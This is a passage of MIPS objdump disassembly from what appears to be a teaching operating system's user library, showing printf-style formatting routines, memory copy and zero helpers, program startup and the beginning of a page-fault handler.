400280: 24847258 addiu a0,a0,29272
400284: 00602821 move a1,v1
400288: 0c100086 jal 400218 <writef>
40028c: 01003021 move a2,t0
400290: 3c040040 lui a0,0x40
400294: 24840180 addiu a0,a0,384
400298: 00002821 move a1,zero
40029c: 8fa70010 lw a3,16(sp)
4002a0: 0c1000b0 jal 4002c0 <user_lp_Print>
4002a4: 02003021 move a2,s0
4002a8: 3c040040 lui a0,0x40
4002ac: 0c100086 jal 400218 <writef>
4002b0: 2484752c addiu a0,a0,29996
4002b4: 1000ffff b 4002b4 <_user_panic+0x5c>
4002b8: 00000000 nop
4002bc: 00000000 nop
004002c0 <user_lp_Print>:
4002c0: 27bdfbd8 addiu sp,sp,-1064
4002c4: afbf0420 sw ra,1056(sp)
4002c8: afb5041c sw s5,1052(sp)
4002cc: afb40418 sw s4,1048(sp)
4002d0: afb30414 sw s3,1044(sp)
4002d4: afb20410 sw s2,1040(sp)
4002d8: afb1040c sw s1,1036(sp)
4002dc: afb00408 sw s0,1032(sp)
4002e0: 0080a821 move s5,a0
4002e4: 00a09021 move s2,a1
4002e8: 00c02821 move a1,a2
4002ec: 00e09821 move s3,a3
4002f0: 80a30000 lb v1,0(a1)
4002f4: 00000000 nop
4002f8: 1060000d beqz v1,400330 <user_lp_Print+0x70>
4002fc: 00a08021 move s0,a1
400300: 1000015e b 40087c <user_lp_Print+0x5bc>
400304: 24020025 li v0,37
400308: 00a08021 move s0,a1
40030c: 26100001 addiu s0,s0,1
400310: 82020000 lb v0,0(s0)
400314: 00000000 nop
400318: 10400006 beqz v0,400334 <user_lp_Print+0x74>
40031c: 02058823 subu s1,s0,a1
400320: 10430005 beq v0,v1,400338 <user_lp_Print+0x78>
400324: 2e2203e9 sltiu v0,s1,1001
400328: 1000fff9 b 400310 <user_lp_Print+0x50>
40032c: 26100001 addiu s0,s0,1
400330: 02058823 subu s1,s0,a1
400334: 2e2203e9 sltiu v0,s1,1001
400338: 14400008 bnez v0,40035c <user_lp_Print+0x9c>
40033c: 02203021 move a2,s1
400340: 02402021 move a0,s2
400344: 3c050040 lui a1,0x40
400348: 24a57000 addiu a1,a1,28672
40034c: 02a0f809 jalr s5
400350: 2406001d li a2,29
400354: 1000ffff b 400354 <user_lp_Print+0x94>
400358: 00000000 nop
40035c: 02a0f809 jalr s5
400360: 02402021 move a0,s2
400364: 82020000 lb v0,0(s0)
400368: 00000000 nop
40036c: 10400135 beqz v0,400844 <user_lp_Print+0x584>
400370: 02519021 addu s2,s2,s1
400374: 82030001 lb v1,1(s0)
400378: 2402006c li v0,108
40037c: 10620003 beq v1,v0,40038c <user_lp_Print+0xcc>
400380: 26110001 addiu s1,s0,1
400384: 10000003 b 400394 <user_lp_Print+0xd4>
400388: 00002021 move a0,zero
40038c: 26110002 addiu s1,s0,2
400390: 24040001 li a0,1
400394: 82230000 lb v1,0(s1)
400398: 2402002d li v0,45
40039c: 14620004 bne v1,v0,4003b0 <user_lp_Print+0xf0>
4003a0: 00003821 move a3,zero
4003a4: 26310001 addiu s1,s1,1
4003a8: 24070001 li a3,1
4003ac: 82230000 lb v1,0(s1)
4003b0: 24020030 li v0,48
4003b4: 14620003 bne v1,v0,4003c4 <user_lp_Print+0x104>
4003b8: 24090020 li t1,32
4003bc: 26310001 addiu s1,s1,1
4003c0: 24090030 li t1,48
4003c4: 82260000 lb a2,0(s1)
4003c8: 00000000 nop
4003cc: 24c2ffd0 addiu v0,a2,-48
4003d0: 304200ff andi v0,v0,0xff
4003d4: 2c42000a sltiu v0,v0,10
4003d8: 1040000e beqz v0,400414 <user_lp_Print+0x154>
4003dc: 00004021 move t0,zero
4003e0: 00081040 sll v0,t0,0x1
4003e4: 000818c0 sll v1,t0,0x3
4003e8: 00431021 addu v0,v0,v1
4003ec: 00461021 addu v0,v0,a2
4003f0: 2448ffd0 addiu t0,v0,-48
4003f4: 26310001 addiu s1,s1,1
4003f8: 82260000 lb a2,0(s1)
4003fc: 00000000 nop
400400: 24c2ffd0 addiu v0,a2,-48
400404: 304200ff andi v0,v0,0xff
400408: 2c42000a sltiu v0,v0,10
40040c: 1440fff5 bnez v0,4003e4 <user_lp_Print+0x124>
400410: 00081040 sll v0,t0,0x1
400414: 82230000 lb v1,0(s1)
400418: 2402002e li v0,46
40041c: 14620014 bne v1,v0,400470 <user_lp_Print+0x1b0>
400420: 2c620079 sltiu v0,v1,121
400424: 26310001 addiu s1,s1,1
400428: 92220000 lbu v0,0(s1)
40042c: 00000000 nop
400430: 2442ffd0 addiu v0,v0,-48
400434: 304200ff andi v0,v0,0xff
400438: 2c42000a sltiu v0,v0,10
40043c: 10400009 beqz v0,400464 <user_lp_Print+0x1a4>
400440: 00000000 nop
400444: 26310001 addiu s1,s1,1
400448: 92220000 lbu v0,0(s1)
40044c: 00000000 nop
400450: 2442ffd0 addiu v0,v0,-48
400454: 304200ff andi v0,v0,0xff
400458: 2c42000a sltiu v0,v0,10
40045c: 1440fff9 bnez v0,400444 <user_lp_Print+0x184>
400460: 00000000 nop
400464: 82230000 lb v1,0(s1)
400468: 00000000 nop
40046c: 2c620079 sltiu v0,v1,121
400470: 104000ed beqz v0,400828 <user_lp_Print+0x568>
400474: 00031080 sll v0,v1,0x2
400478: 3c030040 lui v1,0x40
40047c: 24637024 addiu v1,v1,28708
400480: 00431021 addu v0,v0,v1
400484: 8c420000 lw v0,0(v0)
400488: 00000000 nop
40048c: 00400008 jr v0
400490: 00000000 nop
400494: 10800004 beqz a0,4004a8 <user_lp_Print+0x1e8>
400498: 00000000 nop
40049c: 8e650000 lw a1,0(s3)
4004a0: 10000003 b 4004b0 <user_lp_Print+0x1f0>
4004a4: 26730004 addiu s3,s3,4
4004a8: 8e650000 lw a1,0(s3)
4004ac: 26730004 addiu s3,s3,4
4004b0: afa80010 sw t0,16(sp)
4004b4: afa70014 sw a3,20(sp)
4004b8: afa90018 sw t1,24(sp)
4004bc: afa0001c sw zero,28(sp)
4004c0: 27a40020 addiu a0,sp,32
4004c4: 24060002 li a2,2
4004c8: 0c10028a jal 400a28 <user_PrintNum>
4004cc: 00003821 move a3,zero
4004d0: 00408021 move s0,v0
4004d4: 00403021 move a2,v0
4004d8: 2c4203e9 sltiu v0,v0,1001
4004dc: 14400007 bnez v0,4004fc <user_lp_Print+0x23c>
4004e0: 02402021 move a0,s2
4004e4: 3c050040 lui a1,0x40
4004e8: 24a57000 addiu a1,a1,28672
4004ec: 02a0f809 jalr s5
4004f0: 2406001d li a2,29
4004f4: 1000ffff b 4004f4 <user_lp_Print+0x234>
4004f8: 00000000 nop
4004fc: 02a0f809 jalr s5
400500: 27a50020 addiu a1,sp,32
400504: 100000cd b 40083c <user_lp_Print+0x57c>
400508: 02509021 addu s2,s2,s0
40050c: 10800004 beqz a0,400520 <user_lp_Print+0x260>
400510: 00000000 nop
400514: 8e650000 lw a1,0(s3)
400518: 10000003 b 400528 <user_lp_Print+0x268>
40051c: 26730004 addiu s3,s3,4
400520: 8e650000 lw a1,0(s3)
400524: 26730004 addiu s3,s3,4
400528: 04a10003 bgez a1,400538 <user_lp_Print+0x278>
40052c: 00001021 move v0,zero
400530: 00052823 negu a1,a1
400534: 24020001 li v0,1
400538: afa80010 sw t0,16(sp)
40053c: afa70014 sw a3,20(sp)
400540: afa90018 sw t1,24(sp)
400544: afa0001c sw zero,28(sp)
400548: 27a40020 addiu a0,sp,32
40054c: 2406000a li a2,10
400550: 0c10028a jal 400a28 <user_PrintNum>
400554: 00403821 move a3,v0
400558: 00408021 move s0,v0
40055c: 00403021 move a2,v0
400560: 2c4203e9 sltiu v0,v0,1001
400564: 14400007 bnez v0,400584 <user_lp_Print+0x2c4>
400568: 02402021 move a0,s2
40056c: 3c050040 lui a1,0x40
400570: 24a57000 addiu a1,a1,28672
400574: 02a0f809 jalr s5
400578: 2406001d li a2,29
40057c: 1000ffff b 40057c <user_lp_Print+0x2bc>
400580: 00000000 nop
400584: 02a0f809 jalr s5
400588: 27a50020 addiu a1,sp,32
40058c: 100000ab b 40083c <user_lp_Print+0x57c>
400590: 02509021 addu s2,s2,s0
400594: 10800004 beqz a0,4005a8 <user_lp_Print+0x2e8>
400598: 00000000 nop
40059c: 8e650000 lw a1,0(s3)
4005a0: 10000003 b 4005b0 <user_lp_Print+0x2f0>
4005a4: 26730004 addiu s3,s3,4
4005a8: 8e650000 lw a1,0(s3)
4005ac: 26730004 addiu s3,s3,4
4005b0: afa80010 sw t0,16(sp)
4005b4: afa70014 sw a3,20(sp)
4005b8: afa90018 sw t1,24(sp)
4005bc: afa0001c sw zero,28(sp)
4005c0: 27a40020 addiu a0,sp,32
4005c4: 24060008 li a2,8
4005c8: 0c10028a jal 400a28 <user_PrintNum>
4005cc: 00003821 move a3,zero
4005d0: 00408021 move s0,v0
4005d4: 00403021 move a2,v0
4005d8: 2c4203e9 sltiu v0,v0,1001
4005dc: 14400007 bnez v0,4005fc <user_lp_Print+0x33c>
4005e0: 02402021 move a0,s2
4005e4: 3c050040 lui a1,0x40
4005e8: 24a57000 addiu a1,a1,28672
4005ec: 02a0f809 jalr s5
4005f0: 2406001d li a2,29
4005f4: 1000ffff b 4005f4 <user_lp_Print+0x334>
4005f8: 00000000 nop
4005fc: 02a0f809 jalr s5
400600: 27a50020 addiu a1,sp,32
400604: 1000008d b 40083c <user_lp_Print+0x57c>
400608: 02509021 addu s2,s2,s0
40060c: 10800004 beqz a0,400620 <user_lp_Print+0x360>
400610: 00000000 nop
400614: 8e650000 lw a1,0(s3)
400618: 10000003 b 400628 <user_lp_Print+0x368>
40061c: 26730004 addiu s3,s3,4
400620: 8e650000 lw a1,0(s3)
400624: 26730004 addiu s3,s3,4
400628: afa80010 sw t0,16(sp)
40062c: afa70014 sw a3,20(sp)
400630: afa90018 sw t1,24(sp)
400634: afa0001c sw zero,28(sp)
400638: 27a40020 addiu a0,sp,32
40063c: 2406000a li a2,10
400640: 0c10028a jal 400a28 <user_PrintNum>
400644: 00003821 move a3,zero
400648: 00408021 move s0,v0
40064c: 00403021 move a2,v0
400650: 2c4203e9 sltiu v0,v0,1001
400654: 14400007 bnez v0,400674 <user_lp_Print+0x3b4>
400658: 02402021 move a0,s2
40065c: 3c050040 lui a1,0x40
400660: 24a57000 addiu a1,a1,28672
400664: 02a0f809 jalr s5
400668: 2406001d li a2,29
40066c: 1000ffff b 40066c <user_lp_Print+0x3ac>
400670: 00000000 nop
400674: 02a0f809 jalr s5
400678: 27a50020 addiu a1,sp,32
40067c: 1000006f b 40083c <user_lp_Print+0x57c>
400680: 02509021 addu s2,s2,s0
400684: 10800004 beqz a0,400698 <user_lp_Print+0x3d8>
400688: 00000000 nop
40068c: 8e650000 lw a1,0(s3)
400690: 10000003 b 4006a0 <user_lp_Print+0x3e0>
400694: 26730004 addiu s3,s3,4
400698: 8e650000 lw a1,0(s3)
40069c: 26730004 addiu s3,s3,4
4006a0: afa80010 sw t0,16(sp)
4006a4: afa70014 sw a3,20(sp)
4006a8: afa90018 sw t1,24(sp)
4006ac: afa0001c sw zero,28(sp)
4006b0: 27a40020 addiu a0,sp,32
4006b4: 24060010 li a2,16
4006b8: 0c10028a jal 400a28 <user_PrintNum>
4006bc: 00003821 move a3,zero
4006c0: 00408021 move s0,v0
4006c4: 00403021 move a2,v0
4006c8: 2c4203e9 sltiu v0,v0,1001
4006cc: 14400007 bnez v0,4006ec <user_lp_Print+0x42c>
4006d0: 02402021 move a0,s2
4006d4: 3c050040 lui a1,0x40
4006d8: 24a57000 addiu a1,a1,28672
4006dc: 02a0f809 jalr s5
4006e0: 2406001d li a2,29
4006e4: 1000ffff b 4006e4 <user_lp_Print+0x424>
4006e8: 00000000 nop
4006ec: 02a0f809 jalr s5
4006f0: 27a50020 addiu a1,sp,32
4006f4: 10000051 b 40083c <user_lp_Print+0x57c>
4006f8: 02509021 addu s2,s2,s0
4006fc: 10800004 beqz a0,400710 <user_lp_Print+0x450>
400700: 00000000 nop
400704: 8e650000 lw a1,0(s3)
400708: 10000003 b 400718 <user_lp_Print+0x458>
40070c: 26730004 addiu s3,s3,4
400710: 8e650000 lw a1,0(s3)
400714: 26730004 addiu s3,s3,4
400718: afa80010 sw t0,16(sp)
40071c: afa70014 sw a3,20(sp)
400720: afa90018 sw t1,24(sp)
400724: 24020001 li v0,1
400728: afa2001c sw v0,28(sp)
40072c: 27a40020 addiu a0,sp,32
400730: 24060010 li a2,16
400734: 0c10028a jal 400a28 <user_PrintNum>
400738: 00003821 move a3,zero
40073c: 00408021 move s0,v0
400740: 00403021 move a2,v0
400744: 2c4203e9 sltiu v0,v0,1001
400748: 14400007 bnez v0,400768 <user_lp_Print+0x4a8>
40074c: 02402021 move a0,s2
400750: 3c050040 lui a1,0x40
400754: 24a57000 addiu a1,a1,28672
400758: 02a0f809 jalr s5
40075c: 2406001d li a2,29
400760: 1000ffff b 400760 <user_lp_Print+0x4a0>
400764: 00000000 nop
400768: 02a0f809 jalr s5
40076c: 27a50020 addiu a1,sp,32
400770: 10000032 b 40083c <user_lp_Print+0x57c>
400774: 02509021 addu s2,s2,s0
400778: 26740004 addiu s4,s3,4
40077c: 27a40020 addiu a0,sp,32
400780: 82650003 lb a1,3(s3)
400784: 0c100223 jal 40088c <user_PrintChar>
400788: 01003021 move a2,t0
40078c: 00408021 move s0,v0
400790: 00403021 move a2,v0
400794: 2c4203e9 sltiu v0,v0,1001
400798: 14400007 bnez v0,4007b8 <user_lp_Print+0x4f8>
40079c: 02402021 move a0,s2
4007a0: 3c050040 lui a1,0x40
4007a4: 24a57000 addiu a1,a1,28672
4007a8: 02a0f809 jalr s5
4007ac: 2406001d li a2,29
4007b0: 1000ffff b 4007b0 <user_lp_Print+0x4f0>
4007b4: 00000000 nop
4007b8: 02a0f809 jalr s5
4007bc: 27a50020 addiu a1,sp,32
4007c0: 02509021 addu s2,s2,s0
4007c4: 1000001d b 40083c <user_lp_Print+0x57c>
4007c8: 02809821 move s3,s4
4007cc: 26740004 addiu s4,s3,4
4007d0: 27a40020 addiu a0,sp,32
4007d4: 8e650000 lw a1,0(s3)
4007d8: 0c100242 jal 400908 <user_PrintString>
4007dc: 01003021 move a2,t0
4007e0: 00408021 move s0,v0
4007e4: 00403021 move a2,v0
4007e8: 2c4203e9 sltiu v0,v0,1001
4007ec: 14400007 bnez v0,40080c <user_lp_Print+0x54c>
4007f0: 02402021 move a0,s2
4007f4: 3c050040 lui a1,0x40
4007f8: 24a57000 addiu a1,a1,28672
4007fc: 02a0f809 jalr s5
400800: 2406001d li a2,29
400804: 1000ffff b 400804 <user_lp_Print+0x544>
400808: 00000000 nop
40080c: 02a0f809 jalr s5
400810: 27a50020 addiu a1,sp,32
400814: 02509021 addu s2,s2,s0
400818: 10000008 b 40083c <user_lp_Print+0x57c>
40081c: 02809821 move s3,s4
400820: 10000006 b 40083c <user_lp_Print+0x57c>
400824: 2631ffff addiu s1,s1,-1
400828: 02402021 move a0,s2
40082c: 02202821 move a1,s1
400830: 02a0f809 jalr s5
400834: 24060001 li a2,1
400838: 26520001 addiu s2,s2,1
40083c: 1000feac b 4002f0 <user_lp_Print+0x30>
400840: 26250001 addiu a1,s1,1
400844: 02402021 move a0,s2
400848: 3c050040 lui a1,0x40
40084c: 24a57020 addiu a1,a1,28704
400850: 02a0f809 jalr s5
400854: 24060001 li a2,1
400858: 8fbf0420 lw ra,1056(sp)
40085c: 8fb5041c lw s5,1052(sp)
400860: 8fb40418 lw s4,1048(sp)
400864: 8fb30414 lw s3,1044(sp)
400868: 8fb20410 lw s2,1040(sp)
40086c: 8fb1040c lw s1,1036(sp)
400870: 8fb00408 lw s0,1032(sp)
400874: 03e00008 jr ra
400878: 27bd0428 addiu sp,sp,1064
40087c: 1462fea2 bne v1,v0,400308 <user_lp_Print+0x48>
400880: 24030025 li v1,37
400884: 1000feaa b 400330 <user_lp_Print+0x70>
400888: 00a08021 move s0,a1
0040088c <user_PrintChar>:
40088c: 00052e00 sll a1,a1,0x18
400890: 1cc00002 bgtz a2,40089c <user_PrintChar+0x10>
400894: 00052e03 sra a1,a1,0x18
400898: 24060001 li a2,1
40089c: 10e00014 beqz a3,4008f0 <user_PrintChar+0x64>
4008a0: 28c20002 slti v0,a2,2
4008a4: 14400016 bnez v0,400900 <user_PrintChar+0x74>
4008a8: a0850000 sb a1,0(a0)
4008ac: 24030001 li v1,1
4008b0: 24050020 li a1,32
4008b4: 00831021 addu v0,a0,v1
4008b8: 24630001 addiu v1,v1,1
4008bc: 10c30010 beq a2,v1,400900 <user_PrintChar+0x74>
4008c0: a0450000 sb a1,0(v0)
4008c4: 1000fffc b 4008b8 <user_PrintChar+0x2c>
4008c8: 00831021 addu v0,a0,v1
4008cc: 00001821 move v1,zero
4008d0: 24080020 li t0,32
4008d4: 00641021 addu v0,v1,a0
4008d8: 24630001 addiu v1,v1,1
4008dc: 1467fffd bne v1,a3,4008d4 <user_PrintChar+0x48>
4008e0: a0480000 sb t0,0(v0)
4008e4: 00c41021 addu v0,a2,a0
4008e8: 10000005 b 400900 <user_PrintChar+0x74>
4008ec: a045ffff sb a1,-1(v0)
4008f0: 24c7ffff addiu a3,a2,-1
4008f4: 1ce0fff5 bgtz a3,4008cc <user_PrintChar+0x40>
4008f8: 00c41021 addu v0,a2,a0
4008fc: a045ffff sb a1,-1(v0)
400900: 03e00008 jr ra
400904: 00c01021 move v0,a2
00400908 <user_PrintString>:
400908: 80a20000 lb v0,0(a1)
40090c: 00000000 nop
400910: 14400003 bnez v0,400920 <user_PrintString+0x18>
400914: 24a30001 addiu v1,a1,1
400918: 10000007 b 400938 <user_PrintString+0x30>
40091c: 00004021 move t0,zero
400920: 00004021 move t0,zero
400924: 25080001 addiu t0,t0,1
400928: 80620000 lb v0,0(v1)
40092c: 00000000 nop
400930: 1440fffc bnez v0,400924 <user_PrintString+0x1c>
400934: 24630001 addiu v1,v1,1
400938: 00c8102a slt v0,a2,t0
40093c: 10400002 beqz v0,400948 <user_PrintString+0x40>
400940: 00000000 nop
400944: 01003021 move a2,t0
400948: 14e00031 bnez a3,400a10 <user_PrintString+0x108>
40094c: 00c83823 subu a3,a2,t0
400950: 1000002b b 400a00 <user_PrintString+0xf8>
400954: 00000000 nop
400958: 00003821 move a3,zero
40095c: 00871021 addu v0,a0,a3
400960: 00a71821 addu v1,a1,a3
400964: 90630000 lbu v1,0(v1)
400968: 24e70001 addiu a3,a3,1
40096c: 1507fffb bne t0,a3,40095c <user_PrintString+0x54>
400970: a0430000 sb v1,0(v0)
400974: 0106102a slt v0,t0,a2
400978: 10400029 beqz v0,400a20 <user_PrintString+0x118>
40097c: 00001821 move v1,zero
400980: 00881021 addu v0,a0,t0
400984: 24050020 li a1,32
400988: 00c82023 subu a0,a2,t0
40098c: a0450000 sb a1,0(v0)
400990: 24630001 addiu v1,v1,1
400994: 10640022 beq v1,a0,400a20 <user_PrintString+0x118>
400998: 24420001 addiu v0,v0,1
40099c: 1000fffc b 400990 <user_PrintString+0x88>
4009a0: a0450000 sb a1,0(v0)
4009a4: 00001821 move v1,zero
4009a8: 24090020 li t1,32
4009ac: 00831021 addu v0,a0,v1
4009b0: 24630001 addiu v1,v1,1
4009b4: 1467fffd bne v1,a3,4009ac <user_PrintString+0xa4>
4009b8: a0490000 sb t1,0(v0)
4009bc: 00e6102a slt v0,a3,a2
4009c0: 10400017 beqz v0,400a20 <user_PrintString+0x118>
4009c4: 00872021 addu a0,a0,a3
4009c8: 00e61023 subu v0,a3,a2
4009cc: 01021021 addu v0,t0,v0
4009d0: 00a21821 addu v1,a1,v0
4009d4: 00002821 move a1,zero
4009d8: 00c73823 subu a3,a2,a3
4009dc: 90620000 lbu v0,0(v1)
4009e0: 00000000 nop
4009e4: a0820000 sb v0,0(a0)
4009e8: 24a50001 addiu a1,a1,1
4009ec: 24630001 addiu v1,v1,1
4009f0: 10a7000b beq a1,a3,400a20 <user_PrintString+0x118>
4009f4: 24840001 addiu a0,a0,1
4009f8: 1000fff8 b 4009dc <user_PrintString+0xd4>
4009fc: 00000000 nop
400a00: 1ce0ffe8 bgtz a3,4009a4 <user_PrintString+0x9c>
400a04: 00e6102a slt v0,a3,a2
400a08: 1000ffed b 4009c0 <user_PrintString+0xb8>
400a0c: 00000000 nop
400a10: 1d00ffd1 bgtz t0,400958 <user_PrintString+0x50>
400a14: 0106102a slt v0,t0,a2
400a18: 1000ffd7 b 400978 <user_PrintString+0x70>
400a1c: 00000000 nop
400a20: 03e00008 jr ra
400a24: 00c01021 move v0,a2
00400a28 <user_PrintNum>:
400a28: 8fa90010 lw t1,16(sp)
400a2c: 8fac0014 lw t4,20(sp)
400a30: 8fab001c lw t3,28(sp)
400a34: 83aa001b lb t2,27(sp)
400a38: 00804021 move t0,a0
400a3c: 14c00002 bnez a2,400a48 <user_PrintNum+0x20>
400a40: 00a6001b divu zero,a1,a2
400a44: 0007000d break 0x7
400a48: 00001810 mfhi v1
400a4c: 2862000a slti v0,v1,10
400a50: 10400004 beqz v0,400a64 <user_PrintNum+0x3c>
400a54: 24620030 addiu v0,v1,48
400a58: a1020000 sb v0,0(t0)
400a5c: 1000000c b 400a90 <user_PrintNum+0x68>
400a60: 25080001 addiu t0,t0,1
400a64: 11600005 beqz t3,400a7c <user_PrintNum+0x54>
400a68: 24620057 addiu v0,v1,87
400a6c: 24620037 addiu v0,v1,55
400a70: a1020000 sb v0,0(t0)
400a74: 10000003 b 400a84 <user_PrintNum+0x5c>
400a78: 25080001 addiu t0,t0,1
400a7c: a1020000 sb v0,0(t0)
400a80: 25080001 addiu t0,t0,1
400a84: 14c00002 bnez a2,400a90 <user_PrintNum+0x68>
400a88: 00a6001b divu zero,a1,a2
400a8c: 0007000d break 0x7
400a90: 00002812 mflo a1
400a94: 14a0ffe9 bnez a1,400a3c <user_PrintNum+0x14>
400a98: 00000000 nop
400a9c: 10e00005 beqz a3,400ab4 <user_PrintNum+0x8c>
400aa0: 01043023 subu a2,t0,a0
400aa4: 2402002d li v0,45
400aa8: a1020000 sb v0,0(t0)
400aac: 25080001 addiu t0,t0,1
400ab0: 01043023 subu a2,t0,a0
400ab4: 0126102a slt v0,t1,a2
400ab8: 10400002 beqz v0,400ac4 <user_PrintNum+0x9c>
400abc: 00000000 nop
400ac0: 00c04821 move t1,a2
400ac4: 11800002 beqz t4,400ad0 <user_PrintNum+0xa8>
400ac8: 00000000 nop
400acc: 240a0020 li t2,32
400ad0: 10e00033 beqz a3,400ba0 <user_PrintNum+0x178>
400ad4: 00c9102a slt v0,a2,t1
400ad8: 15800031 bnez t4,400ba0 <user_PrintNum+0x178>
400adc: 00000000 nop
400ae0: 24020030 li v0,48
400ae4: 1542002e bne t2,v0,400ba0 <user_PrintNum+0x178>
400ae8: 00c9102a slt v0,a2,t1
400aec: 24c6ffff addiu a2,a2,-1
400af0: 2528ffff addiu t0,t1,-1
400af4: 00c8102a slt v0,a2,t0
400af8: 10400008 beqz v0,400b1c <user_PrintNum+0xf4>
400afc: 01061023 subu v0,t0,a2
400b00: 00861821 addu v1,a0,a2
400b04: 00002821 move a1,zero
400b08: 24070030 li a3,48
400b0c: a0670000 sb a3,0(v1)
400b10: 24a50001 addiu a1,a1,1
400b14: 14a2fffd bne a1,v0,400b0c <user_PrintNum+0xe4>
400b18: 24630001 addiu v1,v1,1
400b1c: 00891821 addu v1,a0,t1
400b20: 2402002d li v0,45
400b24: 1000000d b 400b5c <user_PrintNum+0x134>
400b28: a062ffff sb v0,-1(v1)
400b2c: a0aa0000 sb t2,0(a1)
400b30: 24630001 addiu v1,v1,1
400b34: 01261023 subu v0,t1,a2
400b38: 1462fffc bne v1,v0,400b2c <user_PrintNum+0x104>
400b3c: 24a50001 addiu a1,a1,1
400b40: 11800006 beqz t4,400b5c <user_PrintNum+0x134>
400b44: 00000000 nop
400b48: 24c6ffff addiu a2,a2,-1
400b4c: 1cc00005 bgtz a2,400b64 <user_PrintNum+0x13c>
400b50: 00003821 move a3,zero
400b54: 03e00008 jr ra
400b58: 01201021 move v0,t1
400b5c: 1000fffb b 400b4c <user_PrintNum+0x124>
400b60: 2526ffff addiu a2,t1,-1
400b64: 00802821 move a1,a0
400b68: 00862021 addu a0,a0,a2
400b6c: 80a20000 lb v0,0(a1)
400b70: 90830000 lbu v1,0(a0)
400b74: 00000000 nop
400b78: a0a30000 sb v1,0(a1)
400b7c: a0820000 sb v0,0(a0)
400b80: 24e70001 addiu a3,a3,1
400b84: 24c6ffff addiu a2,a2,-1
400b88: 24a50001 addiu a1,a1,1
400b8c: 00e6102a slt v0,a3,a2
400b90: 10400008 beqz v0,400bb4 <user_PrintNum+0x18c>
400b94: 2484ffff addiu a0,a0,-1
400b98: 1000fff4 b 400b6c <user_PrintNum+0x144>
400b9c: 00000000 nop
400ba0: 1040ffe7 beqz v0,400b40 <user_PrintNum+0x118>
400ba4: 00000000 nop
400ba8: 00862821 addu a1,a0,a2
400bac: 1000ffdf b 400b2c <user_PrintNum+0x104>
400bb0: 00001821 move v1,zero
400bb4: 01201021 move v0,t1
400bb8: 03e00008 jr ra
400bbc: 00000000 nop
00400bc0 <exit>:
400bc0: 27bdffe8 addiu sp,sp,-24
400bc4: afbf0010 sw ra,16(sp)
400bc8: 0c100554 jal 401550 <syscall_env_destroy>
400bcc: 00002021 move a0,zero
400bd0: 8fbf0010 lw ra,16(sp)
400bd4: 00000000 nop
400bd8: 03e00008 jr ra
400bdc: 27bd0018 addiu sp,sp,24
00400be0 <libmain>:
400be0: 27bdffe0 addiu sp,sp,-32
400be4: afbf001c sw ra,28(sp)
400be8: afb20018 sw s2,24(sp)
400bec: afb10014 sw s1,20(sp)
400bf0: afb00010 sw s0,16(sp)
400bf4: 00808821 move s1,a0
400bf8: 00a09021 move s2,a1
400bfc: 3c100041 lui s0,0x41
400c00: 0c10053a jal 4014e8 <syscall_getenvid>
400c04: ae008004 sw zero,-32764(s0)
400c08: 304203ff andi v0,v0,0x3ff
400c0c: 00022080 sll a0,v0,0x2
400c10: 00021940 sll v1,v0,0x5
400c14: 00641823 subu v1,v1,a0
400c18: 00621821 addu v1,v1,v0
400c1c: 000318c0 sll v1,v1,0x3
400c20: 3c020040 lui v0,0x40
400c24: 8c426000 lw v0,24576(v0)
400c28: 00000000 nop
400c2c: 00621821 addu v1,v1,v0
400c30: ae038004 sw v1,-32764(s0)
400c34: 02202021 move a0,s1
400c38: 0c100038 jal 4000e0 <umain>
400c3c: 02402821 move a1,s2
400c40: 0c1002f0 jal 400bc0 <exit>
400c44: 00000000 nop
400c48: 8fbf001c lw ra,28(sp)
400c4c: 8fb20018 lw s2,24(sp)
400c50: 8fb10014 lw s1,20(sp)
400c54: 8fb00010 lw s0,16(sp)
400c58: 03e00008 jr ra
400c5c: 27bd0020 addiu sp,sp,32
00400c60 <uget_sp>:
400c60: 27bdffe8 addiu sp,sp,-24
400c64: afbf0010 sw ra,16(sp)
400c68: 0c100034 jal 4000d0 <get_sp>
400c6c: 00000000 nop
400c70: 2403f000 li v1,-4096
400c74: 00431024 and v0,v0,v1
400c78: 8fbf0010 lw ra,16(sp)
400c7c: 00000000 nop
400c80: 03e00008 jr ra
400c84: 27bd0018 addiu sp,sp,24
00400c88 <user_bcopy>:
400c88: 30820003 andi v0,a0,0x3
400c8c: 14400004 bnez v0,400ca0 <user_bcopy+0x18>
400c90: 00c53021 addu a2,a2,a1
400c94: 30a20003 andi v0,a1,0x3
400c98: 10400018 beqz v0,400cfc <user_bcopy+0x74>
400c9c: 24a20003 addiu v0,a1,3
400ca0: 00a6102b sltu v0,a1,a2
400ca4: 1440000d bnez v0,400cdc <user_bcopy+0x54>
400ca8: 00a01821 move v1,a1
400cac: 03e00008 jr ra
400cb0: 00000000 nop
400cb4: 8c820000 lw v0,0(a0)
400cb8: 00000000 nop
400cbc: aca20000 sw v0,0(a1)
400cc0: 24a50004 addiu a1,a1,4
400cc4: 24630007 addiu v1,v1,7
400cc8: 0066182b sltu v1,v1,a2
400ccc: 1060fff4 beqz v1,400ca0 <user_bcopy+0x18>
400cd0: 24840004 addiu a0,a0,4
400cd4: 1000fff7 b 400cb4 <user_bcopy+0x2c>
400cd8: 00a01821 move v1,a1
400cdc: 90820000 lbu v0,0(a0)
400ce0: 00000000 nop
400ce4: a0620000 sb v0,0(v1)
400ce8: 24630001 addiu v1,v1,1
400cec: 1066ffef beq v1,a2,400cac <user_bcopy+0x24>
400cf0: 24840001 addiu a0,a0,1
400cf4: 1000fff9 b 400cdc <user_bcopy+0x54>
400cf8: 00000000 nop
400cfc: 0046102b sltu v0,v0,a2
400d00: 1440ffec bnez v0,400cb4 <user_bcopy+0x2c>
400d04: 00a01821 move v1,a1
400d08: 1000ffe6 b 400ca4 <user_bcopy+0x1c>
400d0c: 00a6102b sltu v0,a1,a2
00400d10 <user_bzero>:
400d10: 24a2ffff addiu v0,a1,-1
400d14: 04400007 bltz v0,400d34 <user_bzero+0x24>
400d18: 00801821 move v1,a0
400d1c: 00821021 addu v0,a0,v0
400d20: 24420001 addiu v0,v0,1
400d24: a0600000 sb zero,0(v1)
400d28: 24630001 addiu v1,v1,1
400d2c: 1462fffd bne v1,v0,400d24 <user_bzero+0x14>
400d30: 00000000 nop
400d34: 03e00008 jr ra
400d38: 00000000 nop
00400d3c <pgfault>:
400d3c: 27bdffd8 addiu sp,sp,-40
400d40: afbf0020 sw ra,32(sp)
400d44: afb1001c sw s1,28(sp)
400d48: afb00018 sw s0,24(sp)
400d4c: 00041302 srl v0,a0,0xc
400d50: 3c030040 lui v1,0x40
400d54: 8c636008 lw v1,24584(v1)
400d58: 00021080 sll v0,v0,0x2
400d5c: 00431021 addu v0,v0,v1
400d60: 8c420000 lw v0,0(v0)
400d64: 00000000 nop
